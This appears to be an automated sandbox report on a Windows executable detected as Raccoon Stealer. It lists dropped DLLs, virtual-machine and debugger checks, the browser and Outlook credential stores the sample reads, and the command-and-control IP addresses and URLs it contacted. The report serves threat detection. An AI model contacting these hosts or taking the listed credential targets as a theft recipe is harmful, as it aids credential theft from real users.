Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dll Jump to dropped file
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened / queried: C:\Program Files (x86)\Hyper-V\VMCreate.exe Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_004362A1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043DA90
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0045E752 FindFirstFileExW, 0_2_0045E752
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA, 0_2_00434721
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: Amcache.hve.0.dr Binary or memory string: VMware
Source: Amcache.hve.0.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.0.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.0.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr Binary or memory string: VMware7,1
Source: Amcache.hve.0.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Tk6dsSEyOC.exe, 00000000.00000003.294431831.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.305356064.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316187429.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr Binary or memory string: VMware, Inc.me
Source: Tk6dsSEyOC.exe, 00000000.00000003.305347531.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWi
Source: Amcache.hve.0.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.0.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary, 0_2_004333DD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004322AF __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 0_2_004322AF

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_004362A1
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 0_2_00429B40
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_0045084A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0045084A
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00435C73 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 0_2_00435C73
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_00427AAA GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_00427AAA
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Code function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_004362A1

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.0.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

Stealing of Sensitive Information:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 528742 Sample: Tk6dsSEyOC.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 32 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->32 34 Multi AV Scanner detection for domain / URL 2->34 36 Antivirus detection for URL or domain 2->36 38 4 other signatures 2->38 7 Tk6dsSEyOC.exe 82 2->7         started        process3 dnsIp4 26 193.38.54.238, 80 SERVERIUS-ASNL Russian Federation 7->26 28 91.219.236.162, 80 SERVERASTRA-ASHU Hungary 7->28 30 6 other IPs or domains 7->30 18 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\...\vcruntime140.dll, PE32 7->20 dropped 22 C:\Users\user\AppData\...\ucrtbase.dll, PE32 7->22 dropped 24 56 other files (none is malicious) 7->24 dropped 40 Detected unpacking (changes PE section rights) 7->40 42 Detected unpacking (overwrites its own PE header) 7->42 44 Tries to steal Mail credentials (via file / registry access) 7->44 46 2 other signatures 7->46 12 cmd.exe 1 7->12         started        file5 signatures6 process7 process8 14 conhost.exe 12->14         started        16 timeout.exe 1 12->16         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.219.236.240
 unknown Hungary
56322 SERVERASTRA-ASHU true
91.219.236.162
 unknown Hungary
56322 SERVERASTRA-ASHU true
188.127.251.217
 unknown Russian Federation
56694 DHUBRU false
91.219.236.69
 unknown Hungary
56322 SERVERASTRA-ASHU true
74.119.192.122
 unknown United States
40015 MOVECLICKLLCUS true
193.38.54.238
 unknown Russian Federation
50673 SERVERIUS-ASNL true
185.163.47.176
 unknown Moldova Republic of
39798 MIVOCLOUDMD true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b true
  • Avira URL Cloud: safe
 unknown
https://t.me/masterdanteloma false
    		high
    http://91.219.236.240/masterdanteloma true
    • Avira URL Cloud: safe
    		 unknown
    http://74.119.192.122/masterdanteloma true
    • Avira URL Cloud: safe
    		 unknown
    http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 true
    • Avira URL Cloud: safe
    		 unknown
    http://193.38.54.238/masterdanteloma true
    • Avira URL Cloud: safe
    		 unknown
    http://91.219.236.69/ true
    • Avira URL Cloud: safe
    		 unknown
    http://91.219.236.162/masterdanteloma true
    • Avira URL Cloud: safe
    		 unknown
    http://185.163.47.176/masterdanteloma true
    • Avira URL Cloud: safe
    		 unknown